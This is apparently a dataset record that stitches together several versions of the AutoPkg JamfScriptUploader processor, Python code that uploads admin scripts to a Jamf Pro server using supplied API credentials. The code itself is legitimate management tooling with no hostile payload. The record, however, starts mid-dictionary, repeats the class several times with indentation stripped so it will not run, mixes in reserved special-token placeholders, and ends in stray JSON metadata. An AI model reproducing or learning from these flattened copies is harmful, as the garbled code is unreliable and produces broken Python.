'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_PASSWORD': {'required': True, 'description':
'Password of api user, optionally set as a key in the com.github.autopkg preference file.'
}, 'script_path': {'required': False, 'description':
'Full path to the script to be uploaded'}, 'script_name': {
'required': False, 'description': 'Name of the script in Jamf'},
'script_category': {'required': False, 'description':
'Script category', 'default': ''}, 'script_priority': {'required':
False, 'description': 'Script priority (BEFORE or AFTER)',
'default': 'AFTER'}, 'osrequirements': {'required': False,
'description': 'Script OS requirements', 'default': ''},
'script_info': {'required': False, 'description':
'Script info field', 'default': ''}, 'script_notes': {'required':
False, 'description': 'Script notes field', 'default': ''},
'script_parameter4': {'required': False, 'description':
'Script parameter 4 title', 'default': ''}, 'script_parameter5': {
'required': False, 'description': 'Script parameter 5 title',
'default': ''}, 'script_parameter6': {'required': False,
'description': 'Script parameter 6 title', 'default': ''},
'script_parameter7': {'required': False, 'description':
'Script parameter 7 title', 'default': ''}, 'script_parameter8': {
'required': False, 'description': 'Script parameter 8 title',
'default': ''}, 'script_parameter9': {'required': False,
'description': 'Script parameter 9 title', 'default': ''},
'script_parameter10': {'required': False, 'description':
'Script parameter 10 title', 'default': ''}, 'script_parameter11':
{'required': False, 'description': 'Script parameter 11 title',
'default': ''}, 'replace_script': {'required': False, 'description':
'Overwrite an existing script if True.', 'default': False}, 'sleep':
{'required': False, 'description':
'Pause after running this processor for specified seconds.',
'default': '0'}}
output_variables = {'script_name': {'required': False, 'description':
'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':
{'description': 'Description of interesting results.'}}
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.insert(0, os.path.dirname(__file__))
<|reserved_special_token_0|>
class JamfScriptUploader(JamfUploaderBase):
description = (
'A processor for AutoPkg that will upload a script to a Jamf Cloud or on-prem server.'
)
input_variables = {'JSS_URL': {'required': True, 'description':
'URL to a Jamf Pro server that the API user has write access to, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_USERNAME': {'required': True, 'description':
'Username of account with appropriate access to jss, optionally set as a key in the com.github.autopkg preference file.'
}, 'API_PASSWORD': {'required': True, 'description':
'Password of api user, optionally set as a key in the com.github.autopkg preference file.'
}, 'script_path': {'required': False, 'description':
'Full path to the script to be uploaded'}, 'script_name': {
'required': False, 'description': 'Name of the script in Jamf'},
'script_category': {'required': False, 'description':
'Script category', 'default': ''}, 'script_priority': {'required':
False, 'description': 'Script priority (BEFORE or AFTER)',
'default': 'AFTER'}, 'osrequirements': {'required': False,
'description': 'Script OS requirements', 'default': ''},
'script_info': {'required': False, 'description':
'Script info field', 'default': ''}, 'script_notes': {'required':
False, 'description': 'Script notes field', 'default': ''},
'script_parameter4': {'required': False, 'description':
'Script parameter 4 title', 'default': ''}, 'script_parameter5': {
'required': False, 'description': 'Script parameter 5 title',
'default': ''}, 'script_parameter6': {'required': False,
'description': 'Script parameter 6 title', 'default': ''},
'script_parameter7': {'required': False, 'description':
'Script parameter 7 title', 'default': ''}, 'script_parameter8': {
'required': False, 'description': 'Script parameter 8 title',
'default': ''}, 'script_parameter9': {'required': False,
'description': 'Script parameter 9 title', 'default': ''},
'script_parameter10': {'required': False, 'description':
'Script parameter 10 title', 'default': ''}, 'script_parameter11':
{'required': False, 'description': 'Script parameter 11 title',
'default': ''}, 'replace_script': {'required': False, 'description':
'Overwrite an existing script if True.', 'default': False}, 'sleep':
{'required': False, 'description':
'Pause after running this processor for specified seconds.',
'default': '0'}}
output_variables = {'script_name': {'required': False, 'description':
'Name of the uploaded script'}, 'jamfscriptuploader_summary_result':
{'description': 'Description of interesting results.'}}
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
# When executed directly (rather than loaded by autopkg), run the
# processor's standalone shell entry point.
if __name__ == '__main__':
    PROCESSOR = JamfScriptUploader()
    PROCESSOR.execute_shell()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os.path
import sys
from time import sleep
from autopkglib import ProcessorError
# to use a base module in AutoPkg we need to add this path to the sys.path;
# this lets JamfUploaderLib be imported from the processor's own directory
sys.path.insert(0, os.path.dirname(__file__))
from JamfUploaderLib.JamfUploaderBase import JamfUploaderBase  # noqa: E402
__all__ = ['JamfScriptUploader']
class JamfScriptUploader(JamfUploaderBase):
    """AutoPkg processor that uploads a script object to Jamf Pro."""

    description = (
        'A processor for AutoPkg that will upload a script to a Jamf Cloud '
        'or on-prem server.'
    )
    input_variables = {
        'JSS_URL': {
            'required': True,
            'description': (
                'URL to a Jamf Pro server that the API user has write '
                'access to, optionally set as a key in the '
                'com.github.autopkg preference file.'
            ),
        },
        'API_USERNAME': {
            'required': True,
            'description': (
                'Username of account with appropriate access to jss, '
                'optionally set as a key in the com.github.autopkg '
                'preference file.'
            ),
        },
        'API_PASSWORD': {
            'required': True,
            'description': (
                'Password of api user, optionally set as a key in the '
                'com.github.autopkg preference file.'
            ),
        },
        'script_path': {
            'required': False,
            'description': 'Full path to the script to be uploaded',
        },
        'script_name': {
            'required': False,
            'description': 'Name of the script in Jamf',
        },
        'script_category': {
            'required': False,
            'description': 'Script category',
            'default': '',
        },
        'script_priority': {
            'required': False,
            'description': 'Script priority (BEFORE or AFTER)',
            'default': 'AFTER',
        },
        'osrequirements': {
            'required': False,
            'description': 'Script OS requirements',
            'default': '',
        },
        'script_info': {
            'required': False,
            'description': 'Script info field',
            'default': '',
        },
        'script_notes': {
            'required': False,
            'description': 'Script notes field',
            'default': '',
        },
        'script_parameter4': {
            'required': False,
            'description': 'Script parameter 4 title',
            'default': '',
        },
        'script_parameter5': {
            'required': False,
            'description': 'Script parameter 5 title',
            'default': '',
        },
        'script_parameter6': {
            'required': False,
            'description': 'Script parameter 6 title',
            'default': '',
        },
        'script_parameter7': {
            'required': False,
            'description': 'Script parameter 7 title',
            'default': '',
        },
        'script_parameter8': {
            'required': False,
            'description': 'Script parameter 8 title',
            'default': '',
        },
        'script_parameter9': {
            'required': False,
            'description': 'Script parameter 9 title',
            'default': '',
        },
        'script_parameter10': {
            'required': False,
            'description': 'Script parameter 10 title',
            'default': '',
        },
        'script_parameter11': {
            'required': False,
            'description': 'Script parameter 11 title',
            'default': '',
        },
        'replace_script': {
            'required': False,
            'description': 'Overwrite an existing script if True.',
            'default': False,
        },
        'sleep': {
            'required': False,
            'description': 'Pause after running this processor for specified seconds.',
            'default': '0',
        },
    }
    output_variables = {
        'script_name': {
            'required': False,
            'description': 'Name of the uploaded script',
        },
        'jamfscriptuploader_summary_result': {
            'description': 'Description of interesting results.',
        },
    }
def upload_script(self, jamf_url, script_name, script_path, category_id,
script_category, script_info, script_notes, script_priority,
script_parameter4, script_parameter5, script_parameter6,
script_parameter7, script_parameter8, script_parameter9,
script_parameter10, script_parameter11, script_os_requirements,
token, obj_id=0):
"""Update script metadata."""
if os.path.exists(script_path):
with open(script_path, 'r') as file:
script_contents = file.read()
else:
raise ProcessorError('Script does not exist!')
script_contents = self.substitute_assignable_keys(script_contents)
if script_priority:
script_priority = script_priority.upper()
script_data = {'name': script_name, 'info': script_info, 'notes':
script_notes, 'priority': script_priority, 'categoryId':
category_id, 'categoryName': script_category, 'parameter4':
script_parameter4, 'parameter5': script_parameter5,
'parameter6': script_parameter6, 'parameter7':
script_parameter7, 'parameter8': script_parameter8,
'parameter9': script_parameter9, 'parameter10':
script_parameter10, 'parameter11': script_parameter11,
'osRequirements': script_os_requirements, 'scriptContents':
script_contents}
self.output('Script data:', verbose_level=2)
self.output(script_data, verbose_level=2)
script_json = self.write_json_file(script_data)
self.output('Uploading script..')
object_type = 'script'
if obj_id:
url = '{}/{}/{}'.format(jamf_url, self.api_endpoints(
object_type), obj_id)
else:
url = '{}/{}'.format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output('Script upload attempt {}'.format(count),
verbose_level=2)
request = 'PUT' if obj_id else 'POST'
r = self.curl(request=request, url=url, token=token, data=
script_json)
if self.status_check(r, 'Script', script_name, request) == 'break':
break
if count > 5:
self.output('Script upload did not succeed after 5 attempts')
self.output('\nHTTP POST Response Code: {}'.format(r.
status_code))
raise ProcessorError('ERROR: Script upload failed ')
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get('JSS_URL')
self.jamf_user = self.env.get('API_USERNAME')
self.jamf_password = self.env.get('API_PASSWORD')
self.script_path = self.env.get('script_path')
self.script_name = self.env.get('script_name')
self.script_category = self.env.get('script_category')
self.script_priority = self.env.get('script_priority')
self.osrequirements = self.env.get('osrequirements')
self.script_info = self.env.get('script_info')
self.script_notes = self.env.get('script_notes')
self.script_parameter4 = self.env.get('script_parameter4')
self.script_parameter5 = self.env.get('script_parameter5')
self.script_parameter6 = self.env.get('script_parameter6')
self.script_parameter7 = self.env.get('script_parameter7')
self.script_parameter8 = self.env.get('script_parameter8')
self.script_parameter9 = self.env.get('script_parameter9')
self.script_parameter10 = self.env.get('script_parameter10')
self.script_parameter11 = self.env.get('script_parameter11')
self.replace = self.env.get('replace_script')
self.sleep = self.env.get('sleep')
if not self.replace or self.replace == 'False':
self.replace = False
if 'jamfscriptuploader_summary_result' in self.env:
del self.env['jamfscriptuploader_summary_result']
script_uploaded = False
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.
jamf_password)
if self.script_category:
self.output('Checking categories for {}'.format(self.
script_category))
obj_type = 'category'
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(self.jamf_url,
obj_type, obj_name, token)
if not category_id:
self.output('WARNING: Category not found!')
category_id = '-1'
else:
self.output('Category {} found: ID={}'.format(self.
script_category, category_id))
else:
self.script_category = ''
category_id = '-1'
if not self.script_path.startswith('/'):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(
f'ERROR: Script file {self.script_path} not found')
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
self.output("Checking for existing '{}' on {}".format(self.
script_name, self.jamf_url))
self.output('Full path: {}'.format(self.script_path), verbose_level=2)
obj_type = 'script'
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(self.jamf_url, obj_type,
obj_name, token)
if obj_id:
self.output("Script '{}' already exists: ID {}".format(self.
script_name, obj_id))
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}"
.format(self.replace), verbose_level=1)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce."
, verbose_level=1)
return
self.upload_script(self.jamf_url, self.script_name, self.
script_path, category_id, self.script_category, self.
script_info, self.script_notes, self.script_priority, self.
script_parameter4, self.script_parameter5, self.
script_parameter6, self.script_parameter7, self.
script_parameter8, self.script_parameter9, self.
script_parameter10, self.script_parameter11, self.
osrequirements, token, obj_id)
script_uploaded = True
self.env['script_name'] = self.script_name
self.env['script_uploaded'] = script_uploaded
if script_uploaded:
self.env['jamfscriptuploader_summary_result'] = {'summary_text':
'The following scripts were created or updated in Jamf Pro:',
'report_fields': ['script', 'path', 'category', 'priority',
'os_req', 'info', 'notes', 'P4', 'P5', 'P6', 'P7', 'P8',
'P9', 'P10', 'P11'], 'data': {'script': self.script_name,
'path': self.script_path, 'category': self.script_category,
'priority': str(self.script_priority), 'info': self.
script_info, 'os_req': self.osrequirements, 'notes': self.
script_notes, 'P4': self.script_parameter4, 'P5': self.
script_parameter5, 'P6': self.script_parameter6, 'P7': self
.script_parameter7, 'P8': self.script_parameter8, 'P9':
self.script_parameter9, 'P10': self.script_parameter10,
'P11': self.script_parameter11}}
# Standalone entry point: instantiate the processor and run it via the
# AutoPkg processor shell harness when invoked directly.
if __name__ == '__main__':
    PROCESSOR = JamfScriptUploader()
    PROCESSOR.execute_shell()
<|reserved_special_token_1|>
#!/usr/local/autopkg/python
"""
JamfScriptUploader processor for uploading items to Jamf Pro using AutoPkg
by G Pugh
"""
import os.path
import sys
from time import sleep
from autopkglib import ProcessorError # pylint: disable=import-error
# to use a base module in AutoPkg we need to add this path to the sys.path.
# this violates flake8 E402 (PEP8 imports) but is unavoidable, so the following
# imports require noqa comments for E402
sys.path.insert(0, os.path.dirname(__file__))
from JamfUploaderLib.JamfUploaderBase import JamfUploaderBase # noqa: E402
__all__ = ["JamfScriptUploader"]
class JamfScriptUploader(JamfUploaderBase):
description = (
"A processor for AutoPkg that will upload a script to a Jamf Cloud or "
"on-prem server."
)
input_variables = {
"JSS_URL": {
"required": True,
"description": "URL to a Jamf Pro server that the API user has write access "
"to, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_USERNAME": {
"required": True,
"description": "Username of account with appropriate access to "
"jss, optionally set as a key in the com.github.autopkg "
"preference file.",
},
"API_PASSWORD": {
"required": True,
"description": "Password of api user, optionally set as a key in "
"the com.github.autopkg preference file.",
},
"script_path": {
"required": False,
"description": "Full path to the script to be uploaded",
},
"script_name": {
"required": False,
"description": "Name of the script in Jamf",
},
"script_category": {
"required": False,
"description": "Script category",
"default": "",
},
"script_priority": {
"required": False,
"description": "Script priority (BEFORE or AFTER)",
"default": "AFTER",
},
"osrequirements": {
"required": False,
"description": "Script OS requirements",
"default": "",
},
"script_info": {
"required": False,
"description": "Script info field",
"default": "",
},
"script_notes": {
"required": False,
"description": "Script notes field",
"default": "",
},
"script_parameter4": {
"required": False,
"description": "Script parameter 4 title",
"default": "",
},
"script_parameter5": {
"required": False,
"description": "Script parameter 5 title",
"default": "",
},
"script_parameter6": {
"required": False,
"description": "Script parameter 6 title",
"default": "",
},
"script_parameter7": {
"required": False,
"description": "Script parameter 7 title",
"default": "",
},
"script_parameter8": {
"required": False,
"description": "Script parameter 8 title",
"default": "",
},
"script_parameter9": {
"required": False,
"description": "Script parameter 9 title",
"default": "",
},
"script_parameter10": {
"required": False,
"description": "Script parameter 10 title",
"default": "",
},
"script_parameter11": {
"required": False,
"description": "Script parameter 11 title",
"default": "",
},
"replace_script": {
"required": False,
"description": "Overwrite an existing script if True.",
"default": False,
},
"sleep": {
"required": False,
"description": "Pause after running this processor for specified seconds.",
"default": "0",
},
}
output_variables = {
"script_name": {
"required": False,
"description": "Name of the uploaded script",
},
"jamfscriptuploader_summary_result": {
"description": "Description of interesting results.",
},
}
def upload_script(
self,
jamf_url,
script_name,
script_path,
category_id,
script_category,
script_info,
script_notes,
script_priority,
script_parameter4,
script_parameter5,
script_parameter6,
script_parameter7,
script_parameter8,
script_parameter9,
script_parameter10,
script_parameter11,
script_os_requirements,
token,
obj_id=0,
):
"""Update script metadata."""
# import script from file and replace any keys in the script
if os.path.exists(script_path):
with open(script_path, "r") as file:
script_contents = file.read()
else:
raise ProcessorError("Script does not exist!")
# substitute user-assignable keys
script_contents = self.substitute_assignable_keys(script_contents)
# priority has to be in upper case. Let's make it nice for the user
if script_priority:
script_priority = script_priority.upper()
# build the object
script_data = {
"name": script_name,
"info": script_info,
"notes": script_notes,
"priority": script_priority,
"categoryId": category_id,
"categoryName": script_category,
"parameter4": script_parameter4,
"parameter5": script_parameter5,
"parameter6": script_parameter6,
"parameter7": script_parameter7,
"parameter8": script_parameter8,
"parameter9": script_parameter9,
"parameter10": script_parameter10,
"parameter11": script_parameter11,
"osRequirements": script_os_requirements,
"scriptContents": script_contents,
}
self.output(
"Script data:",
verbose_level=2,
)
self.output(
script_data,
verbose_level=2,
)
script_json = self.write_json_file(script_data)
self.output("Uploading script..")
# if we find an object ID we put, if not, we post
object_type = "script"
if obj_id:
url = "{}/{}/{}".format(jamf_url, self.api_endpoints(object_type), obj_id)
else:
url = "{}/{}".format(jamf_url, self.api_endpoints(object_type))
count = 0
while True:
count += 1
self.output(
"Script upload attempt {}".format(count),
verbose_level=2,
)
request = "PUT" if obj_id else "POST"
r = self.curl(request=request, url=url, token=token, data=script_json)
# check HTTP response
if self.status_check(r, "Script", script_name, request) == "break":
break
if count > 5:
self.output("Script upload did not succeed after 5 attempts")
self.output("\nHTTP POST Response Code: {}".format(r.status_code))
raise ProcessorError("ERROR: Script upload failed ")
if int(self.sleep) > 30:
sleep(int(self.sleep))
else:
sleep(30)
return r
def main(self):
"""Do the main thing here"""
self.jamf_url = self.env.get("JSS_URL")
self.jamf_user = self.env.get("API_USERNAME")
self.jamf_password = self.env.get("API_PASSWORD")
self.script_path = self.env.get("script_path")
self.script_name = self.env.get("script_name")
self.script_category = self.env.get("script_category")
self.script_priority = self.env.get("script_priority")
self.osrequirements = self.env.get("osrequirements")
self.script_info = self.env.get("script_info")
self.script_notes = self.env.get("script_notes")
self.script_parameter4 = self.env.get("script_parameter4")
self.script_parameter5 = self.env.get("script_parameter5")
self.script_parameter6 = self.env.get("script_parameter6")
self.script_parameter7 = self.env.get("script_parameter7")
self.script_parameter8 = self.env.get("script_parameter8")
self.script_parameter9 = self.env.get("script_parameter9")
self.script_parameter10 = self.env.get("script_parameter10")
self.script_parameter11 = self.env.get("script_parameter11")
self.replace = self.env.get("replace_script")
self.sleep = self.env.get("sleep")
# handle setting replace in overrides
if not self.replace or self.replace == "False":
self.replace = False
# clear any pre-existing summary result
if "jamfscriptuploader_summary_result" in self.env:
del self.env["jamfscriptuploader_summary_result"]
script_uploaded = False
# obtain the relevant credentials
token = self.handle_uapi_auth(self.jamf_url, self.jamf_user, self.jamf_password)
# get the id for a category if supplied
if self.script_category:
self.output("Checking categories for {}".format(self.script_category))
# check for existing category - requires obj_name
obj_type = "category"
obj_name = self.script_category
category_id = self.get_uapi_obj_id_from_name(
self.jamf_url,
obj_type,
obj_name,
token,
)
if not category_id:
self.output("WARNING: Category not found!")
category_id = "-1"
else:
self.output(
"Category {} found: ID={}".format(self.script_category, category_id)
)
else:
self.script_category = ""
category_id = "-1"
# handle files with a relative path
if not self.script_path.startswith("/"):
found_template = self.get_path_to_file(self.script_path)
if found_template:
self.script_path = found_template
else:
raise ProcessorError(f"ERROR: Script file {self.script_path} not found")
# now start the process of uploading the object
if not self.script_name:
self.script_name = os.path.basename(self.script_path)
# check for existing script
self.output(
"Checking for existing '{}' on {}".format(self.script_name, self.jamf_url)
)
self.output(
"Full path: {}".format(self.script_path),
verbose_level=2,
)
obj_type = "script"
obj_name = self.script_name
obj_id = self.get_uapi_obj_id_from_name(
self.jamf_url,
obj_type,
obj_name,
token,
)
if obj_id:
self.output(
"Script '{}' already exists: ID {}".format(self.script_name, obj_id)
)
if self.replace:
self.output(
"Replacing existing script as 'replace_script' is set to {}".format(
self.replace
),
verbose_level=1,
)
else:
self.output(
"Not replacing existing script. Use replace_script='True' to enforce.",
verbose_level=1,
)
return
# post the script
self.upload_script(
self.jamf_url,
self.script_name,
self.script_path,
category_id,
self.script_category,
self.script_info,
self.script_notes,
self.script_priority,
self.script_parameter4,
self.script_parameter5,
self.script_parameter6,
self.script_parameter7,
self.script_parameter8,
self.script_parameter9,
self.script_parameter10,
self.script_parameter11,
self.osrequirements,
token,
obj_id,
)
script_uploaded = True
# output the summary
self.env["script_name"] = self.script_name
self.env["script_uploaded"] = script_uploaded
if script_uploaded:
self.env["jamfscriptuploader_summary_result"] = {
"summary_text": "The following scripts were created or updated in Jamf Pro:",
"report_fields": [
"script",
"path",
"category",
"priority",
"os_req",
"info",
"notes",
"P4",
"P5",
"P6",
"P7",
"P8",
"P9",
"P10",
"P11",
],
"data": {
"script": self.script_name,
"path": self.script_path,
"category": self.script_category,
"priority": str(self.script_priority),
"info": self.script_info,
"os_req": self.osrequirements,
"notes": self.script_notes,
"P4": self.script_parameter4,
"P5": self.script_parameter5,
"P6": self.script_parameter6,
"P7": self.script_parameter7,
"P8": self.script_parameter8,
"P9": self.script_parameter9,
"P10": self.script_parameter10,
"P11": self.script_parameter11,
},
}
if __name__ == "__main__":
PROCESSOR = JamfScriptUploader()
PROCESSOR.execute_shell()
|
flexible
|
{
"blob_id": "35d99713df754052a006f76bb6f3cfe9cf875c0b",
"index": 3993,
